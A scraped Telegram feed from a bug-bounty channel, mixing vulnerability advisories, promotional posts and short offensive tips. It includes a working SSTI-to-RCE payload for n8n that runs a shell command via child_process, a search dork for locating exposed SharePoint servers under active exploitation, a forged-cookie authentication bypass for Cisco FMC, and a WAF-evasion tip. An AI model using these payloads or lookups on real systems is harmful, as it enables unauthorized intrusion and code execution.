Brut Security
15.6K subscribers
1.02K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
🚨One Liners for bug bounty

βœ… Download: https://github.com/0xPugal/One-Liners
πŸ”₯5❀1πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)

The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id").toString()')()}}


If you guys are really enjoy to read, then show your love ❀️

#rce #ssti #n8n
❀17πŸ‘5
Happy Bengali New Year 1433 🌸

New year. New game.
No excuses this time , only execution.
Build yourself so strong that opportunities start chasing you.

β€” Brut Security πŸ”₯
❀5πŸ™1🀝1
CVE-2026-32201: Microsoft SharePoint Server Spoofing Vulnerability, 6.5 rating ❗️

Improper input validation in Microsoft SharePoint Server allows an unauthorized attacker to perform spoofing over a network and view sensitive internal data or make unauthorized changes. This vulnerability is already being actively exploited in the wild!

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/DjQpd
πŸ‘‰ Dork: http.headers.microsoftsharepointteamservices:*
πŸ‘‰ Dork (MS subdomains filtered): http.headers.microsoftsharepointteamservices:* !host:*.sharepoint.com

Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201
❀3
Hey Hunter’s,
DarkShadow is here back again!

Authentication Bypass via Forged Session Cookie
(Cisco Secure Firewall Management Center)

Analysis:
-checks only for the presence of the CGISESSID cookie.
-but does not validate whether the session ID is legitimate, active, or tied to an authenticated user.

Impact:
an attacker can supply an arbitrary or default value like csm_processes to bypass the redirect to /ui/login and gain unauthorized access to the protected resource.

So Guy’s if you really enjoy to ready such as methods then show your love🀍

#bugbountytips #auth_bypass
❀7πŸ‘3
🚨 Fortinet just disclosed CVE-2026-39808 and CVE-2026-39813 - 2 critical vulnerabilities affecting FortiSandbox. No active exploitation itw reported as of yet.

Scan your infrastructure to find vulnerable instances:
CVE-2026-39808: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39808.yaml
CVE-2026-39813: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39813.yaml

CVE-2026-39808 (CVSS 9.1):
An Improper Neutralization of Special Elements used in an OS Command ('OS command injection') vulnerability [CWE-78] in FortiSandbox may allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests.

CVE-2026-39813 (CVSS 9.1):
A Path Traversal vulnerability [CWE-24] in FortiSandbox JRPC API may allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests.

Patches are available as per vendor advisories:
https://fortiguard.fortinet.com/psirt/FG-IR-26-112
https://fortiguard.fortinet.com/psirt/FG-IR-26-100
❀3🀝1
If I had a dollar for every β€œhack my ex” request...
😒5❀2πŸ”₯2
Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!πŸ˜‹πŸ˜‹πŸ˜‹
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4
Please open Telegram to view this post
VIEW IN TELEGRAM
Nahamsec Reconnaissance Guide
❀9πŸ”₯4πŸ‘3πŸ‘2😁2
Launching Soon :)
❀16πŸ”₯9
⚠️Just dropped something I've been building for a while

🌐A complete Web Application Bug Bounty Methodology β€” 59 pages, 20 chapters, real techniques I actually use. Covers everything from recon to JWT attacks, SSRF, XSS, file upload RCE, HTTP smuggling, reporting and more.

🟒Giving away 5 free coupons to the first 5 people who drop a comment. No catch.

▢️ https://topmate.io/saumadip/2054509
πŸ”₯ Coupon Code= awxe

β€” Brut Security
Please open Telegram to view this post
VIEW IN TELEGRAM
5❀4πŸ”₯3πŸ‘1πŸ‘1
Brut Security pinned «⚠️Just dropped something I've been building for a while 🌐A complete Web Application Bug Bounty Methodology β€” 59 pages, 20 chapters, real techniques I actually use. Covers everything from recon to JWT attacks, SSRF, XSS, file upload RCE, HTTP smuggling, reporting…»
Sneak Peak of the Contents
❀3πŸ‘1🫑1πŸ—Ώ1
Hey Hunter’s,
DarkShadow is here back again!

Ranking Most common /api vulnerable endpoints:

/api/v1/users
/api/v1/users/{userId}
/api/v1/oauth/token
/api/v1/forgot-password
/api/v1/debug or /api/v1/status


(not only /api/v1 also test for /api/v2)

🀫if WAF blocks your request then find ip origin and it might works with out bypassing by any extra waf bypass payloads!!!

#bugbountytips #info_leak
πŸ”₯8❀1